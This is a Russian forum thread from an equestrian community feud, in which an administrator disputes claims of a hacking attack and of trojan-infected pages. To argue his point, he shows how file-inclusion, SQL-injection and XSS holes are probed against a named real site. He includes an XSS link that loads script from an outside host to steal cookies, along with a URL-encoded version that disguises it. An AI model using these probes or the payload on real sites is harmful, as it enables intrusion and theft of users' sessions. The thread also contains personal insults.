Карфаген

Форум закрыт! Новый адрес http://carfagen.flybb.ru/ !
Текущее время: 29-03, 17:48

Часовой пояс: UTC + 3 часа




Форум закрыт Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней.  [ Сообщений: 11 ] 
Автор Сообщение
 Заголовок сообщения: Сетевая...безграмотность!
СообщениеДобавлено: 26-07, 21:50 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
Итак. Продолжаем исследовать и выискивать "ляпы" наших любимых и неподражаемых последователей ОЭН.
Задаюсь вопросом - где еще можно накосячить? С лошадьми? С лошадьми накосячили только так. последователи ОЭН вкупе с гуру наплодили столько глюков, что ой-ой!
Оказывается, они косячат не только с лошадьми...но и с сетью! На вид вполне адекватные(а адекватные ли? - прим.мозга.) говорят такую чушь!
Выдают желаемое за действительность такую лажу! Что становится стыдно. Впрочем, все по порядку. Вот текст admina с ЧП.

Цитата:
Как оказывается владельцы www.equestrian.ru давно уже точат зуб на Планету лошадей.
Видимо задело их за живое, не могут они так просто сидеть и смотреть... Пытаются что то делать...
А вопли побирушки о том, что ее ящики были взломаны натолкнула их на мысль.
Сегодня днем была зафиксирована попытка взлома Планеты лошадей и не кем нибудь из кучки больних хор.срушником, а самой госпожой Екатериной Штатновой, которая является пресс-секретарем Федерации конного спорта России. Так же она является одним из основателей (вместе с Михаилом Браво и Александром Кочетовым) сайта «Мой друг - лошадь», ныне "Конное обозрение" (www.equestrian.ru)
Попытки взлома были были пресечены системой безопасности сайта, а данные о попытках взлома сайта были запротоколированы системой.
Теперь у нас имеется полная доказательная база (отчеты системы безопасности и другие неопровержимые доказательства) о том, что данная попытка была имела место.

Читая эти строки хотелось одновременно ржать от смеха, понимая, какую чушь сморозил админ, либо плакать, ужасаясь тем, что они откровенно пользуются незнанием структуры сети.
Пожалуй, я объясню все. чтобы вы поняли одну вещь: Никакой "атаки" на планету г. Екатериной Штатновой не было. Да и сама атака ставится под сомнение.
Рассуждать буду с точки зрения хакера. Так как эта точка зрения :) для меня наиболее оптимальна, да и Вы больше поймете.
Итак, небольшое вступление.
Что значит атака на сайт? Каким образом проводится атака и что сдедует их этого.
Чтобы совершить атаку на сайт, взломать сервер, получить неограниченные привилегии на нем, и иметь полный доступ к сети - нужны
а) прямые руки
б) Нормальные, думающие мозги
в) Пару тройков эксплоитов(специальных программ написанных на языках perl, php, реже С и С++, которые используются по время взлома)
Чтобы взломать сайт - нужно по крайней мере сначала найти уязвимость. В зависимости от системы и программ установленных на сайте - подбирается нужная база уязвимостей. Например, у phpbb2 больше всех "дыр" и следовательно больше возможностей можно провести атаку.
Помимо этого есть еще "общие дыры" в системе. Такие как php-including, sql-injechion, xss-атака, попытка выполнения произвольного кода на портах и пр.
Пройдемся по порядку.
Эксплоиты для демонов
Как утверждает админ, Екатерина Штатнова, пыталась атаковать сайт. Самые первые действия при атаке?
Знающие скажут - сканирование системы и будут правы. Прежде чем лезть на рожон, Е.Ш. просканирует открытые порты. Тем более, если она решилась на взлом. То обзавелась прокси-сервером и полезла бы щупать сайт.
К слову - сканирование портов тоже является разновидностью хакерской атаки. Забегая вперед, думаю, что именно этим и занималась Е.Ш.
Просканировав, и определив порты, она узнала, какие висят демоны. Следовательно, для них нужно искать эксплоиты.
Писав статью, я пытался действовать так же как и Е.Ш. И пробывать виды атак.
Глянув, какие порты на самом деле открыты и что за сервисы там висят, я стал искать эксплоиты в публичных источниках.
Найдя, я сразу отложил такой вариант атаки.
Половина была написана для использования под Linyx. Другая требовала компилиции и превращения в бинарник.
Женщине, а имено уважаемому человеку Екатериной Штатновой лазит по хак порталам, искать сплоиты и компилировать, а потом пытатся использовать их против ЧП - думаю, нет смысла. И так дел много. А тут качай комплилятор, загружай дополнительные библиотеки..Это самый сложный вид атаки для новичка.
Если бы так оно и было - г. Штатнова наняла бы профессионального хакера, а не мучалась сама. Разберем наиболее самые известные атаки на сайт. Неизвестные лежат либо в привате, либо г. Екатерина( или кто там) о них даже не догадывается.
php-including
Этот тип атаки обозначает как - произвольное выполнение команд на сервере. Как определяется данная уязвимость? Заходим на хрюкпланету, в любую ссылку, в любой раздел...видим в строке браузера -
Код:
http://horseplanet.ru/index.php?name=Forums&file=[b]viewtopic&t[/b]

И меняем на
Код:
http://horseplanet.ru/index.php?name=Forums&file=[b]adminlol[/b]

Если в результате этого шаманства у нас выскочила ошибка типа: Warning: main(): Failed opening 'dsdsds.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php:/usr/local/share/pear') in /home/user/www/page.php on line 3
То перед нами банальный инклуд. Создаем небольшой шелл на бесплатном хостинге, и прикручиваем к сайту. А дальше..:)
Но на хрюпланете инклуда нет. Следовательно, сама возможность этой атаки невозможна!
sql-injechion
Этот тип атаки обозначает уязвимость, путем НЕ фильтрации спецсимволов в строке браузера. Из-за чего можно получить приватные данные касающиеся Базы Данных, паролей, Е-mall и пр.
Как находят эту уязвимость?
А просто. к строке типа
Код:
http://horseplanet.ru/index.php?name=Forums&file=viewtopic&t
подставляют кавычку или спецсимвол таким образом
Код:
http://horseplanet.ru/index.php?name=Forums&file=viewtopic&-t"
если фильтрует - значит такая атака невозможна. И Екатерина Штатнова никак не могла попытаться взломать сайт таким образом. Система нас будет откидывать на главную страницу, не более.
xss-атака
Этот метод атаки предназначается не на сервер, а на пользователей сервера, то есть на простых юзеров, которые пользуются им.
Атаку можно совершить используя недостаток сервера в фильтрации входных значении на 80 порту апача..так, уже не туда еду :)
Вкрадце, для того, чтобы совершить такую атаку, нужно найти xss - определить пассивная она или активная(склоняюсь,что пассивная, так как при активной Админ вряд ли что заметил) Пассивная заставляет пользователя перейти по заранее ядовитой ссылке, и сохраняет на левом сайте куки заходящего.
Ссылка должна выглядеть примерно так -
Код:
http://horseplanet.ru/index.php?name='><script src=http://luzer.h16.ru/script/js.js></script>
где обращаетса к http://luzer.h16.ru/script/js.js.

Конечно, если давать в таком виде - слишком подозрительно, номожно скрыть ее например так:
Код:
%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

Не очень подозрительно, согласитесь.
но все же повторюсь - это атака не на сайт, а на пользователей сайта.
Два абсолютных разных значения. Уверен, Покоев Сергей имел ввиду не это.

Что же было? Была ли попытка атаки?
Честно скажу, не знаю. Может, была, а может и выдумано как всегда. Как описано ниже(история с троянами)
Но уверен точно, если и была попытка типа: "Я крутая! Я сайт взломаю!" Точно не Е.Ш.
Почему не она? Да все просто.
Ip.
Администратор, учитывая полнейшее незнание сетевой строения интернета - воспользовался этим и выдал желаемое за действительное.
Во первых. Для выяснения хозяина ай-пи нужно написать заявление в милицию. Милиция позвонит к провайдеру. Провайдер звякнет АТС - и лишь последняя, при предъявлении соответствующей бумажонки назовет домашний адрес и телефон "хакера"
Далее милицонеры толпой направляются домой к "хакеру". Составляют акт. Опечатывают компьютер, допрашивают человека - и все на все уходит..больше ОДНОГО месяцев!
Администратор хрюкпланеты, мало того, в невероятные короткие сроки, без суда и санкции - смог определить чей это ай-пи, так еще и утром написать короткий постик с заголовком "тайная война..."

И это не единственный случай.


Цитата:
Я повыкидывал, разумеется, ссылочки на сайт Боглика и впредь предупреждаю, что любые ссылки на любой чужой сайт будут караться намедленным баном.
Дело не в содержании сайта.
Оно банально.
Три онаниста ( Боглик, Рейтер,и девушка Пилигрим, которая тут выла и желала кому-нибудь отдаться) дрочат себе под нос что-то про ненависть к АГ.
Пусть дрочат, ничего страшного или интересного. Или нового.
Обычное собрание графоманов-онанистов-невзорофреников, свихнувшихся на ненависти к АГ.
Пусть хоть удрочатся до обмороков, нам ни жарко ни холодно. Процесс не остановят ни они ни другие онанисты-одиночки.
сссылочку можно было бы и оставить.
Ну корчатся они там, ну показывают, как им больно и страшно...спасибочки, парни, приятно выяснить, КАК велик ваш ужас....
Можно бы и сходить. Я бы сам водил экскурсии, так как радует там все глаз мой.
НО! Наша служба безопасности выяснила,что каждое посещение сайтика Боглика -снабжает ваш комп массой троянов и других вирусов. Юный онанист играет в хакера и набрав кучу бесплатной заразы с сайтов типа хакер.ру.- нствил на своем сайтике "ловушки" для посетителей. Ну торчит сейчас этот подросток от этого, ну тащится пацан от дешевого хакерства.
Открывая любую тему -вы заражаете свой комп. Чистить придется все. Некоторые из вирусов особо злые - и чистка обойдется дорого. Троянчики воруют у вас пароли ваших мыл и личек, в частности.
Так что, кто уже, что называется , "Был" чистить рекомендую все.
Если уж совсем невмоготу и хочется поржать над потугами онанистов - ходите не со своего компа! лучше с компа врага или начальника.




Идиотское, откровенно развратное содержание больного человека мы опускаем. Оно не интересно.
Это чудо, создало пост и на весь интернет начало кричать, что, на http://karfagen.flybb.ru - происходит заливка троянов на компьютеры жертвы...Так ли оно на самом деле?
Сейчас проверим.


Трояны заливаются с сайта двумя способами -
1) Когда вы скачиваете файл, а вместо файла скачивается и троян.
2) Путем специально внедренного в сайт зловредного скрипта, который в свою очередь скачивает троян или перенаправляет его на на "логово".

при заходе на Карфаген - никаких файлов я не заставляю скачивать. Переходим к 2 способу.
Чтобы внедрить зловредный код в страницу, надо иметь как минимум доступ к серверу. Или взломать его на худой конец.
Ни того, ни другого у меня нет.
Вот и все объяснение. Хостинг форум flybb НЕ предоставляет хостинг php скриптов. Туда невозможно загрузить никакой посторонний объект. Если не верите, можете попытатся.
Можете спросить у главного администратора - он подвердит мои слова.
Можно проверить сайт онлайн-анивирусов. Собственно говоря, можно сделать 100 вещей, которые определяют зловредные программы.
В конце концов, можно поставить самую параноиналью систему, активировать самые лучшие антивирусы и фаерволлеры..
И вы все равно ничего не найдете.
Потому что их тут нет.
И все эти сказочки про вирусы и трояны в мою сторону..это всего лишь сказочки.

Такая же была ситуация, когда меня обвиняли в засылке троянов девушке.
Полный бред.
Хочется спросить, отчего тогда меня не арестовали, не предъявили претензии и почему именно троянщиком стал я?
Хотя, догадываюсь, почему.
Потому что слишком много знаю о сетевой безопасности, и они пользуюясь этим скидывают всю "кашу" на меня.

Так-то друзья. Мы в очередной раз четко и ясно доказали, что аргументов у этих господ нет.
Если появятся новые "ляпы" с удовольствием размещу их здесь.

_________________
http://antilr.msk.ru
Первый противоневзоровский портал.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 16-08, 14:23 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
admin
Site Admin
Зарегистрирован: Apr 2, 2004
Сообщения: 1077
Откуда: Санкт-Петербург
Добавлено: Вс Авг 05, 2007 12:12 pm
Бредни Убоглика
Цитата:
Тут ко мне попали тексты постов, которые строчит этот недалекий индивид на своем маленьком убогленьком сайтишке (вообще, мог бы что ли по лучше для хостинга сайта найти, а не flybb.ru , где даже 8 летний ребенок разбереться и сможет форум сварганить - видимо показатель развития боглика).

Посмотрим. Задача стоит какая, уважаемые посетители? Выглядеть круто на личном домене, + личный хостинг и оплачивать его - либо взять по быстрому бесплатный хостинг. за пять минут создать форум и не парится, ни про защиту ни про оформление.



Цитата:
Меня позабавили познания боглика в устройстве сети (в точности интернета) и т. п. Эти познания у него не далеко ушли от познаний Photoshop'а (видимо изучал по книжке "Фотошоп для самых чайников"). Я думаю, все еще помнят как он облажался на хор.сру и как его те же спортсмены выгнали в шею и забанили там? Видимо начитался таких сайтов как хакер.ру и т. п. и не попытавшись даже хоть как-то разобраться в изученом, всем скопом свалил на страницы своего форумчика.
Ну что ж, мысли его видимо были такие: "Да все равно, в большинстве своем конники люди не далекие в компьютерах, и так все проглотят".

О, как. Оказывается, моя единственная цель, когда я создавал тему - было потрепать языком, мол, я самый крутой и самый умный))))
Весьма позабавило то, что в дальйшем, так называемый администратор не сказал ничего путевого. И я со 100% уверенностью могу сказать, что данную статью, написанную мной - это лишь задело админа, и показало полную неграмотность и забивание на уровень пользователей. Что и подверждает ниже.
Цитата:
Откопал уже давно забытую тему об атаке владельцев equestrian.ru на Планету лошадей и попытался "разобраться"... В двух темах сразу...
Сразу скажу, что все что он написал: Мимо! Ни одного совпадения. Ни чего общего с реальностью. Бред на бреде. (Нет, там частично все правильно написано, ну как на сайтах типа хакер.ру пишут, но только отношения к ПЛ никакого не имеет).

О как..то есть не было сканирование портов, не было перебор параметров, не было поиск уязвимостей.
То есть Штатнова не стала читать научную литературу, а пошла напролом, атаковать не зная как, что этот способ атаки мне неизвестен, а человеку, который не состоит в хак-тусовке, он был под силу, и мало того она им воспользовалась и получила отпор...очень, и очень загадочно.
Если ни инклуд, ни скуль, ни xss - ни сканирование и повал демонов - она не использовала, остается вопрос, что тогда? Думаю, на этот вопрос, ответа не будет.
Цитата:
Убоглик о себе очень высокого мнения, а так же он уж слишком завышает свою важность и степень внимания, которое ему оказывается (снисходительно-пренебрежительное). Он думает что я самолично выискивал его IP в мегабайтах логов, чтобы наложить на него бан. Ну ничего подобного Мелка сошка.
Система безопасности забанила его автоматически, после его "хакерских" экспериментов. Все очень просто. Зато шуму сколько.

О как...забанила..самое интересное, что не смотря на этото бан - я могу ходить на форум и читать их весь бред, который к слову, уже удален.
Цитата:
А по поводу реакции специальных служб: пусть убоглик проверит: создаст какой-нибудь сайтик и напишет что-нибудь, что ну уж очень сильно заинтересует спец службы. И пусть сидит с секундомером в руках в ожидании омона по его душу. Потом расскажет нам (когда выйдет из тюрьмы) на какой секунде ему руки крутили.

Админ, он же Хорсес, он же Сергей Покоев...даже если я создам сайт, размещу рекламу по продаже ядерных боеголовок, даже если я размещу там секретные сведения касаемые гостайны России и Америки - меня найдут максимум через полтора дня. Ну никак за полдня!
Не тот размер. Попытка атаки это только попытка, ничего более.
Таких попыток больше 1000 происходят в сети, и ничего.
А тут...хех высокомерие и наглость. Ничего больше.
лишь в который раз раскрывает глупость и незнание материала.

_________________
http://antilr.msk.ru
Первый противоневзоровский портал.


Последний раз редактировалось Boglik 17-08, 11:38, всего редактировалось 1 раз.

Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 16-08, 17:21 
Не в сети
Спортивная лошадь
Аватара пользователя

Зарегистрирован: 23-07, 21:23
Сообщения: 1400
Откуда: Москва
Да уж, я конечно полный ноль во всех этих компьютерных делах, но даже я сразу поняла, что это бред, про все эти вирусы)

спасибо, что объяснил и разжевал, интересно почитать было)

_________________
Нет дискриминации - я ненавижу всех! ну... кроме Спартанца, конечно же!


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-08, 11:44 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
Я думаю, в дальнейшем раздел новый открыть, посвященный интернету и защите перс.компа :) Скоро открою, если не лень будет.

_________________
http://antilr.msk.ru
Первый противоневзоровский портал.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-08, 11:56 
Не в сети
Жеребёнок
Аватара пользователя

Зарегистрирован: 15-08, 22:31
Сообщения: 69
Откуда: Москва
Ой, надо! :) Обязательно надо. :) А еще бы основы программирования (мечтательно)...

_________________
Куда катится мир? А он катится там, где нет направлений. А потому нельзя сказать, куда...


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-08, 12:35 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
:mrgreen: Кошечка Только основы.
Углубление в пхп, перл и СИ - это не ко мне :D

_________________
http://antilr.msk.ru
Первый противоневзоровский портал.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-08, 13:04 
Не в сети
Жеребёнок
Аватара пользователя

Зарегистрирован: 15-08, 22:31
Сообщения: 69
Откуда: Москва
Таки да... Более чем основы народу в большинстве будет просто неинтересно, ибо непонятно. :D

_________________
Куда катится мир? А он катится там, где нет направлений. А потому нельзя сказать, куда...


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-08, 13:06 
Не в сети
Спортивная лошадь

Зарегистрирован: 20-07, 19:56
Сообщения: 1260
Откуда: Москва
Э-э-э...А зачем это надо в форуме противников лошадиной революции? :oops:

_________________
Свобода - это когда ты ничей, ни в чём, нигде, ни за чем, никуда, ни во что, никогда...(c)


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 17-08, 13:15 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
Летучая Про основы мы еще подумаем. Но про защиту персонального компьтера рассказать надо.
Так как эти сволочи и троянов запускали, и атаковать компьютеры пытались.

_________________
http://antilr.msk.ru
Первый противоневзоровский портал.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 20-08, 11:33 
Не в сети
Главный Администратор
Аватара пользователя

Зарегистрирован: 18-07, 23:25
Сообщения: 460
Откуда: Ижевск.КСК Райтер
Цитата:
Я самозабанился в наказание за ненормативную лексику, допущеную мною в теме....в теме...в какой-то там теме.
Доровольный бан я наложил на себя на неделю.
Было это вчера.
Так что шесть дней уже точно прошло.

Администратор форума не обладает функцией банить модераторов или администратор на какое-то время.
Возможные полномочия: удалить пользователя, снять с модератора обязанности.
Если он сам себя забанил бы - то этот бан был бы вечным.
Итак, он врет и самому себе и окружающим. Что еще раз подверждает нечистоплотность их мыслей.

_________________
http://antilr.msk.ru
Первый противоневзоровский портал.


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 20-08, 11:52 
Не в сети
Стригунок
Аватара пользователя

Зарегистрирован: 28-07, 01:56
Сообщения: 337
Откуда: санкт-петербург
Boglik

Boglik писал(а):
самозабанился в наказание за ненормативную лексику, допущеную мною в теме....в теме...в какой-то там теме.
Доровольный бан я наложил на себя на неделю.
Было это вчера.
Так что шесть дней уже точно прошло.


эта тема обсуждалась в перлах во флейме)))
там мнооогопро это сказали.

_________________
я не за горькое и не за сладкое. я за вкусное!
Изображение


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Форум закрыт Эта тема закрыта, вы не можете редактировать и оставлять сообщения в ней.  [ Сообщений: 11 ] 

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB